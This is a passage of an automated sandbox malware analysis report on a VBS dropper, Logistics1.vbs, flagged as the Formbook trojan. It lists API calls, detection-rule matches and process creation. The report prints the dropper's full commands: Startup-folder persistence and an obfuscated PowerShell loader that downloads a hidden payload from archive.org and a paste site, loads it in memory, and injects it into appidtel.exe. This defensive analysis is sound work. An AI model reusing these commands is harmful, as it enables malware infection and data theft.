            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442BE0 NtQueryValueKey,11_2_03442BE0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442BF0 NtAllocateVirtualMemory,11_2_03442BF0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442B80 NtQueryInformationFile,11_2_03442B80
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442BA0 NtEnumerateValueKey,11_2_03442BA0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442AD0 NtReadFile,11_2_03442AD0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442AF0 NtWriteFile,11_2_03442AF0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442AB0 NtWaitForSingleObject,11_2_03442AB0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034439B0 NtGetContextThread,11_2_034439B0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442F60 NtCreateProcessEx,11_2_03442F60
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442F30 NtCreateSection,11_2_03442F30
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442FE0 NtCreateFile,11_2_03442FE0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442F90 NtProtectVirtualMemory,11_2_03442F90
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442FA0 NtQuerySection,11_2_03442FA0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442FB0 NtResumeThread,11_2_03442FB0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442E30 NtWriteVirtualMemory,11_2_03442E30
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442EE0 NtQueueApcThread,11_2_03442EE0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442E80 NtReadVirtualMemory,11_2_03442E80
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442EA0 NtAdjustPrivilegesToken,11_2_03442EA0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03443D70 NtOpenThread,11_2_03443D70
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442D00 NtSetInformationFile,11_2_03442D00
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442D10 NtMapViewOfSection,11_2_03442D10
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03443D10 NtOpenProcessToken,11_2_03443D10
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442D30 NtUnmapViewOfSection,11_2_03442D30
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442DD0 NtDelayExecution,11_2_03442DD0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442DB0 NtEnumerateKey,11_2_03442DB0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442C60 NtCreateKey,11_2_03442C60
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442C00 NtQueryInformationProcess,11_2_03442C00
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442CC0 NtQueryVirtualMemory,11_2_03442CC0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442CF0 NtOpenProcess,11_2_03442CF0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442CA0 NtQueryInformationToken,11_2_03442CA0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB49FD0E058_2_00007FFB49FD0E05
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB49FD0E0C8_2_00007FFB49FD0E0C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_004100C311_2_004100C3
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_004100BA11_2_004100BA
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_004169FE11_2_004169FE
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_00416A0311_2_00416A03
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_004102E311_2_004102E3
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0040E36311_2_0040E363
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0040332011_2_00403320
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0040E53B11_2_0040E53B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0042EE4311_2_0042EE43
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_00402EA811_2_00402EA8
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_00402EB011_2_00402EB0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0040279011_2_00402790
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CA35211_2_034CA352
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C132D11_2_034C132D
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FD34C11_2_033FD34C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D03E611_2_034D03E6
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341E3F011_2_0341E3F0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0345739A11_2_0345739A
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B027411_2_034B0274
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342B2C011_2_0342B2C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034152A011_2_034152A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034DB16B11_2_034DB16B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0344516C11_2_0344516C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340010011_2_03400100
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF17211_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034AA11811_2_034AA118
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C81CC11_2_034C81CC
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D01AA11_2_034D01AA
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341B1B011_2_0341B1B0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C011_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BF0CC11_2_034BF0CC
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C70E911_2_034C70E9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CF0E011_2_034CF0E0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343475011_2_03434750
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341077011_2_03410770
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340C7C011_2_0340C7C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CF7B011_2_034CF7B0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C16CC11_2_034C16CC
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342C6E011_2_0342C6E0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C757111_2_034C7571
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341053511_2_03410535
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D059111_2_034D0591
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034AD5B011_2_034AD5B0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C244611_2_034C2446
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340146011_2_03401460
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CF43F11_2_034CF43F
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BE4F611_2_034BE4F6
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CAB4011_2_034CAB40
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CFB7611_2_034CFB76
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C6BD711_2_034C6BD7
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0344DBF911_2_0344DBF9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342FB8011_2_0342FB80
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CFA4911_2_034CFA49
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C7A4611_2_034C7A46
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03483A6C11_2_03483A6C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BDAC611_2_034BDAC6
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340EA8011_2_0340EA80
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03455AA011_2_03455AA0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034ADAAC11_2_034ADAAC
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341995011_2_03419950
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342B95011_2_0342B950
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342696211_2_03426962
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034129A011_2_034129A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034DA9A611_2_034DA9A6
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341284011_2_03412840
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341A84011_2_0341A840
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347D80011_2_0347D800
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F68B811_2_033F68B8
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034138E011_2_034138E0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343E8F011_2_0343E8F0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03484F4011_2_03484F40
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CFF0911_2_034CFF09
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03452F2811_2_03452F28
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03430F3011_2_03430F30
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03402FC811_2_03402FC8
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341CFE011_2_0341CFE0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03411F9211_2_03411F92
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CFFB111_2_034CFFB1
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03410E5911_2_03410E59
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CEE2611_2_034CEE26
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CEEDB11_2_034CEEDB
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03422E9011_2_03422E90
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CCE9311_2_034CCE93
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03419EB011_2_03419EB0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03413D4011_2_03413D40
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C1D5A11_2_034C1D5A
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C7D7311_2_034C7D73
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341AD0011_2_0341AD00
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342FDC011_2_0342FDC0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340ADE011_2_0340ADE0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03428DBF11_2_03428DBF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03410C0011_2_03410C00
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03489C3211_2_03489C32
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03400CF211_2_03400CF2
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034CFCF211_2_034CFCF2
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B0CB511_2_034B0CB5
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: String function: 03457E54 appears 89 times
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: String function: 0348F290 appears 105 times
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: String function: 033FB970 appears 268 times
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: String function: 0347EA12 appears 86 times
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: String function: 03445130 appears 36 times
            Source: Logistics1.vbsInitial sample: Strings found which are bigger than 50
            Source: 11.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 11.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.1841927454.00000000032F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 7892, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 8004, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@17/7@2/3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwendzpd.511.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Logistics1.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Logistics1.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( 